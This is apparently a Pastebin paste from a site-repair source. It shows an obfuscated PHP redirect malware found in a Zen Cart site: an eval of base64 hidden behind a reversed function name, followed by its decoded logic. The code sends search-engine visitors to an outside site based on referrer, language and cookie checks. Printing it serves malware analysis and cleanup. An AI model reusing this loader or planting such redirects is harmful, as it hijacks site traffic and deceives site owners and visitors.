hackrepair

Custom zencart redirect hack

Jun 9th, 2012
1,112
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. function reverse($str){
  3. if($str == ''){
  4. return null;
  5. }
  6. if(strlen($str) == 1){
  7. return $str;
  8. }else{
  9. $string = "";
  10. for($i=1;$i<=strlen($str);$i++){
  11. $string .=substr($str,-$i,1);
  12. }
  13. return $string;
  14. }
  15. }
  16. $zencart=reverse("edoced_46esab");
  17. eval ($zencart('ZXJyb3JfcmVwb3J0aW5nKDcpOwokY2hlY2sgPSJzaGluZS1jaGVjayI7CiRjaGVjazIgPSJ0d290aW1lIjsKJGFkc2VuX2NvZGUgPScnOy8vsuXI67nIuOi547jmCiRDb29raWVUaW1lPTA7CmlmIChpc3NldCgkX0NPT0tJRVsiVVNFUklEIl0pIGFuZCAoICRfQ09PS0lFWyJVU0VSSUQiXT09JGNoZWNrICkgKQp7SGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy50aGVtYWdpY21vbWVudC5jby51ayIpO30KZWxzZSBpZiAoaXNzZXQoJF9DT09LSUVbIlVTRVJJRCJdKSBhbmQgKCAkX0NPT0tJRVsiVVNFUklEIl09PSRjaGVjazIpICkKewp9CmVsc2UKewokdGFyZ2V0X3VybD1hcnJheSgpOwovLyR0YXJnZXRfdXJsWzBdPSJodHRwIjsKZm9yKCRpPTA7JGk8Mzk7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Imh0dHA6Ly93d3cudGhlbWFnaWNtb21lbnQuY28udWsiOwp9CmZvcigkaT00MDskaTwxMDA7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Im1haWx0bzpoYWNrc2VvQHBvc3QuY29tIjsNCn0NCmZ1bmN0aW9uIHJhbmRfYXJyYXkoJGFycikgDQp7IA0KCSRhcnJfc2l6ZT1zaXplb2YoJGFycik7DQoJJHRtcF9hcnI9YXJyYXkoKTsgDQoJZm9yKCRpPTA7JGk8JGFycl9zaXplOyRpKyspeyANCgkJbXRfc3JhbmQoKGRvdWJsZSkgbWljcm90aW1lKCkqMTAwMDAwMCk7IA0KCQkkcmQ9bXRfcmFuZCgwLCRhcnJfc2l6ZS0xKTsgDQoJCWlmKCR0bXBfYXJyWyRyZF09PSIiKSANCgkJeyANCgkJCSR0bXBfYXJyWyRyZF09JGFyclskaV07IA0KCQl9IA0KCQllbHNlDQoJCXsgDQoJCQkkaT0kaS0xOyANCgkJfSANCgl9IA0KCXJldHVybiAkdG1wX2FycjsgDQp9DQokYXR0YWNrX3VybD1yYW5kX2FycmF5KCR0YXJnZXRfdXJsKTsNCiRhdHRhY2t1cmw9Ind3dyI7DQokbDE9JF9TRVJWRVJbIkhUVFBfQUNDRVBUX0xBTkdVQUdFIl07DQppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKXsgDQokYTEgPSAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107IA0KfSBlbHNlIHsgDQokYTEgPSAnJzsgDQp9IA0KJGwyPSJ6aCI7CiRhMj0iYmluZyI7CiRhMz0iY29tLmhrIjsKJGE1PSJnb29nbGUiOwokYTQ9InlhaG9vIjsKaWYgKCggc3RycG9zKCRsMSwkbDIpID09PSBmYWxzZSApYW5kKCAoIHN0cnBvcygkYTEsJGEzKSA9PSBmYWxzZSApKWFuZCgoIHN0cnBvcygkYTEsJGEyKSA9PSB0cnVlIClvciggc3RycG9zKCRhMSwkYTUpID09IHRydWUgKW9yKCBzdHJwb3MoJGExLCRhNCkgPT0gdHJ1ZSApKSBhbmQgKCBzdHJwb3MoJGF0dGFja191cmxbMV0sJGF0dGFja3VybCkgPT0gdHJ1ZSApKSB7CnNldGNvb2tpZSgiVVNFUklEIiwgInNoaW5lLWNoZWNrIiwgMCwiLyIsIiIpO0hlYWRlcigiTG9jYXRpb246ICRhdHRhY2tfdXJsWzFdIik7fQplbHNlCnsKc2V0Y29va2llKCJVU0VSSUQiLCAidHdvdGltZSIsIDAsIi8iLCIiKTsKfQp9'));
  18. ?><?php
  19.  
  20.  
  21. DECODED:
  22.  
  23. error_reporting(7);
  24. $check ="shine-check";
  25. $check2 ="twotime";
  26. $adsen_code ='';//
  27. $CookieTime=0;
  28. if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check ) )
  29. {Header("Location: http://www.themagicmoment.co.uk");}
  30. else if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check2) )
  31. {
  32. }
  33. else
  34. {
  35. $target_url=array();
  36. //$target_url[0]="http";
  37. for($i=0;$i<39;$i++)
  38. {
  39. $target_url[$i]="http://www.themagicmoment.co.uk";
  40. }
  41. for($i=40;$i<100;$i++)
  42. {
  43. $target_url[$i]="mailto:hackseo@post.com";
  44. }
  45. function rand_array($arr)
  46. {
  47. $arr_size=sizeof($arr);
  48. $tmp_arr=array();
  49. for($i=0;$i<$arr_size;$i++){
  50. mt_srand((double) microtime()*1000000);
  51. $rd=mt_rand(0,$arr_size-1);
  52. if($tmp_arr[$rd]=="")
  53. {
  54. $tmp_arr[$rd]=$arr[$i];
  55. }
  56. else
  57. {
  58. $i=$i-1;
  59. }
  60. }
  61. return $tmp_arr;
  62. }
  63. $attack_url=rand_array($target_url);
  64. $attackurl="www";
  65. $l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
  66. if(isset($_SERVER['HTTP_REFERER'])){
  67. $a1 = $_SERVER['HTTP_REFERER'];
  68. } else {
  69. $a1 = '';
  70. }
  71. $l2="zh";
  72. $a2="bing";
  73. $a3="com.hk";
  74. $a5="google";
  75. $a4="yahoo";
  76. if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
  77. setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
  78. else
  79. {
  80. setcookie("USERID", "twotime", 0,"/","");
  81. }
  82. }
RAW Paste Data